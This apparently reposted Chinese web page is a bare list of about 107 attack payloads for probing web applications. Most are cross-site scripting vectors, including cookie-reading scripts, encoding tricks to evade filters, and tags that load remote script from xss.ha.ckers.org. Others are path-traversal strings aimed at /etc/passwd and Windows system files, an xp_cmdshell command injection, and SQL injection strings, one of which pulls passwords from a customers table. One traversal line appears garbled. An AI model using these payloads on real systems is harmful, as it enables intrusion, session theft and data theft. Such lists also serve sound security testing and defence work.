XSS跨站测试代码大全

Posted 很久很久以前

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS跨站测试代码大全相关的知识,希望对你有一定的参考价值。

  1 \'><script>alert(document.cookie)</script>
  2 =\'><script>alert(document.cookie)</script>
  3 <script>alert(document.cookie)</script>
  4 <script>alert(vulnerable)</script>
  5 %3Cscript%3Ealert(\'XSS\')%3C/script%3E
  6 <script>alert(\'XSS\')</script>
  7 <img src="javascript:alert(\'XSS\')">
  8 %0a%0a<script>alert(\\"Vulnerable\\")</script>.jsp
  9 %22%3cscript%3ealert(%22xss%22)%3c/script%3e
 10 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 11 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 12 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 13 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 14 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 15 %3f.jsp
 16 %3f.jsp
 17 <script>alert(\'Vulnerable\');</script>
 18 <script>alert(\'Vulnerable\')</script>
 19 ?sql_debug=1
 20 a%5c.aspx
 21 a.jsp/<script>alert(\'Vulnerable\')</script>
 22 a/
 23 a?<script>alert(\'Vulnerable\')</script>
 24 "><script>alert(\'Vulnerable\')</script>
 25 \';exec%20master..xp_cmdshell%20\'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt\'--&&
 26 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 27 %3Cscript%3Ealert(document. domain);%3C/script%3E&
 28 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 29 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
 30 http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
 31 ..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
 32 \\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
 33 \'\';!--"<XSS>=&{()}
 34 <IMG src="javascript:alert(\'XSS\');">
 35 <IMG src=javascript:alert(\'XSS\')>
 36 <IMG src=JaVaScRiPt:alert(\'XSS\')>
 37 <IMG src=JaVaScRiPt:alert("XSS")>
 38 <IMG src=javascript:alert(\'XSS\')>
 39 <IMG src=javascript:alert(\'XSS\')>
 40 <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 41 <IMG src="jav ascript:alert(\'XSS\');">
 42 <IMG src="jav ascript:alert(\'XSS\');">
 43 <IMG src="jav ascript:alert(\'XSS\');">
 44 "<IMG src=java\\0script:alert(\\"XSS\\")>";\' > out
 45 <IMG src=" javascript:alert(\'XSS\');">
 46 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
 47 <BODY BACKGROUND="javascript:alert(\'XSS\')">
 48 <BODY ONLOAD=alert(\'XSS\')>
 49 <IMG DYNSRC="javascript:alert(\'XSS\')">
 50 <IMG LOWSRC="javascript:alert(\'XSS\')">
 51 <BGSOUND src="javascript:alert(\'XSS\');">
 52 <br size="&{alert(\'XSS\')}">
 53 <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
 54 <LINK REL="stylesheet" href="javascript:alert(\'XSS\');">
 55 <IMG src=\'vbscript:msgbox("XSS")\'>
 56 <IMG src="mocha:[code]">
 57 <IMG src="livescript:[code]">
 58 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">
 59 <IFRAME src=javascript:alert(\'XSS\')></IFRAME>
 60 <FRAMESET><FRAME src=javascript:alert(\'XSS\')></FRAME></FRAMESET>
 61 <TABLE BACKGROUND="javascript:alert(\'XSS\')">
 62 <DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">
 63 <DIV STYLE="behaviour: url(\'http://www.how-to-hack.org/exploit.html\');">
 64 <DIV STYLE="width: expression(alert(\'XSS\'));">
 65 <STYLE>@im\\port\'\\ja\\vasc\\ript:alert("XSS")\';</STYLE>
 66 <IMG STYLE=\'xss:expre\\ssion(alert("XSS"))\'>
 67 <STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>
 68 <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(\'XSS\')");}</STYLE><A class="XSS"></A>
 69 <STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>
 70 <BASE href="javascript:alert(\'XSS\');//">
 71 getURL("javascript:alert(\'XSS\')")
 72 a="get";b="URL";c="javascript:";d="alert(\'XSS\');";eval(a+b+c+d);
 73 <XML src="javascript:alert(\'XSS\');">
 74 "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(\'XSS\');}</SCRIPT><"
 75 <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
 76 <IMG src="javascript:alert(\'XSS\')"
 77 <!--#exec cmd="/bin/echo \'<SCRIPT SRC\'"--><!--#exec cmd="/bin/echo \'=http://xss.ha.ckers.org/a.js></SCRIPT>\'"-->
 78 <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
 79 <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 80 <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 81 <SCRIPT a=">" \'\' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 82 <SCRIPT "a=\'>\'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 83 <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 84 <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
 85 admin\'--
 86 \' or 0=0 --
 87 " or 0=0 --
 88 or 0=0 --
 89 \' or 0=0 #
 90 " or 0=0 #
 91 or 0=0 #
 92 \' or \'x\'=\'x
 93 " or "x"="x
 94 \') or (\'x\'=\'x
 95 \' or 1=1--
 96 " or 1=1--
 97 or 1=1--
 98 \' or a=a--
 99 " or "a"="a
100 \') or (\'a\'=\'a
101 ") or ("a"="a
102 hi" or "a"="a
103 hi" or 1=1 --
104 hi\' or 1=1 --
105 hi\' or \'a\'=\'a
106 hi\') or (\'a\'=\'a
107 hi") or ("a"="a[/code]

 

以上是关于XSS跨站测试代码大全的主要内容,如果未能解决你的问题,请参考以下文章

XSS跨站测试代码大全

XSS跨站测试代码大全

2022渗透测试面试大全(过来人的全部家底)

XSS跨站测试代码

来自阿里云的PHP实现的防止跨站和xss攻击代码,测试有用

安全测试之XSS跨站脚本攻击